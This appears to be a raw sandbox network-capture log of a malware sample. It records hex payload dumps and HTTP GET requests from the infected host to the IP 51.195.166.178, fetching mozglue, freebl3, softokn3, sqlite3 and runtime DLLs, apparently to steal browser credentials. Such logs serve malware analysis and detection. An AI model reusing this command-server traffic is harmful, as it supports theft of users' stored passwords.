Aug 5, 2022 13:54:13.092021942 CEST	1253	IN	Data Raw: 00 83 c4 04 89 c1 31 f6 8b 55 e8 e9 23 fd ff ff 8b 8f 4c 01 00 00 85 c9 75 47 8b 8f 48 01 00 00 85 c9 75 29 8b 8f 44 01 00 00 85 c9 75 53 ff 87 40 01 00 00 89 f9 89 c2 56 e8 17 d1 13 00 8b 55 e8 83 c4 04 89 c1 31 f6 e9 e6 fc ff ff 8b 01 89 87 48 Data Ascii: 1U#LuGHu)DuS@VU1H1LEPSD<^MUp,lMA,1USWVP11U4t%?t G
Aug 5, 2022 13:54:13.092031956 CEST	1254	IN	Data Raw: 74 7c a8 01 75 7d 89 f1 ba 02 00 00 00 e8 89 00 00 00 89 c6 85 ff 74 30 8b 0f 8b 57 28 80 79 53 00 75 41 31 c0 85 d2 75 3b 89 47 28 8b 79 0c 85 ff 74 15 8b 0d 78 e0 1d 10 81 f9 b0 0d 13 10 75 46 57 ff 15 dc c6 1d 10 89 f0 5e 5f 5b 5d c3 8b 0f c7 Data Ascii: t\|u}t0W(ySuA1u;G(ytxuFW^_[]A@Il0SQv10WUSWVAtLrdfFF9tuTF%ft!8^
Aug 5, 2022 13:54:13.092041969 CEST	1255	IN	Data Raw: e3 12 00 83 c4 08 31 c0 48 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 50 ff 35 6c 12 1e 10 ff 15 60 c7 1d 10 89 c6 85 c0 0f 84 87 00 00 00 8b 86 e0 00 00 00 89 c1 81 e1 02 10 00 00 83 f9 02 0f 84 8d 00 00 00 83 be f4 00 00 00 00 0f 85 a1 00 00 00 Data Ascii: 1H]USWVP5l`}Gx]1x^_[]M1SMQWOyuM)~
Aug 5, 2022 13:54:15.471147060 CEST	11263	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:15.523406982 CEST	11264	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:15 GMT Content-Type: application/octet-stream Content-Length: 449280 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT ETag: "62543dae-6db00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a2 00 10 a0 a2 00 10 80 a2 00 10 e0 a2 00 10 90 a3 00 10 30 a3 00 10 10 a3 00 10 70 a3 00 10 30 a4 00 10 d0 a3 00 10 b0 a3 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL(["!(`@@Agr?=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B0p0
Aug 5, 2022 13:54:17.446722031 CEST	11735	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:17.499272108 CEST	11736	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:17 GMT Content-Type: application/octet-stream Content-Length: 80128 Connection: keep-alive Last-Modified: Sat, 28 May 2022 16:52:46 GMT ETag: "6292535e-13900" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 27 00 00 02 e0 27 00 00 02 60 2d 00 00 02 e0 32 00 00 02 40 34 00 00 02 70 35 00 00 02 b0 36 00 00 02 28 39 00 00 01 f8 39 00 00 01 04 3b 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL(["!0t(@A? 8 @.text `.data@.idata@@.rsrc@@.reloc @B0''`-2@4p56(99;
Aug 5, 2022 13:54:18.749895096 CEST	11820	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:18.802898884 CEST	11821	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:18 GMT Content-Type: application/octet-stream Content-Length: 627128 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT ETag: "62543da8-991b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 ec 08 89 ce 8b 5d 08 a1 0c 30 09 10 31 e8 89 45 f0 53 e8 8a 14 08 00 83 c4 04 89 c7 8b 46 14 39 f8 73 30 83 ec 0c 8a 45 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!V/@AcQ,pr4CWh0.text `.rdata0@@.data0@.00cfgP @@.tls`"@.rsrcp$@@.reloc4CD.@BUSWV]01ESF9s0E
Aug 5, 2022 13:54:19.432562113 CEST	12482	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:19.484570980 CEST	12483	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:19 GMT Content-Type: application/octet-stream Content-Length: 684984 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT ETag: "62543dc8-a73b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 32 19 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 07 19 08 00 83 c4 04 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL&9b"!6@A4,S,xT8$&0.D.text `.rdata0@@.data<F@&@.00cfg(@@.rsrcx*@@.reloc8$&.@BUhO2t8]h
Aug 5, 2022 13:54:20.538132906 CEST	13206	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:20.590812922 CEST	13208	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:20 GMT Content-Type: application/octet-stream Content-Length: 254392 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT ETag: "62543dbe-3e1b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 8c 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 e8 7b 03 10 83 c4 08 85 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@BUt]h6h{
Aug 5, 2022 13:54:23.897089005 CEST	13476	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:23.949541092 CEST	13477	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:23 GMT Content-Type: application/octet-stream Content-Length: 1099223 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT ETag: "62541f08-10c5d7" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 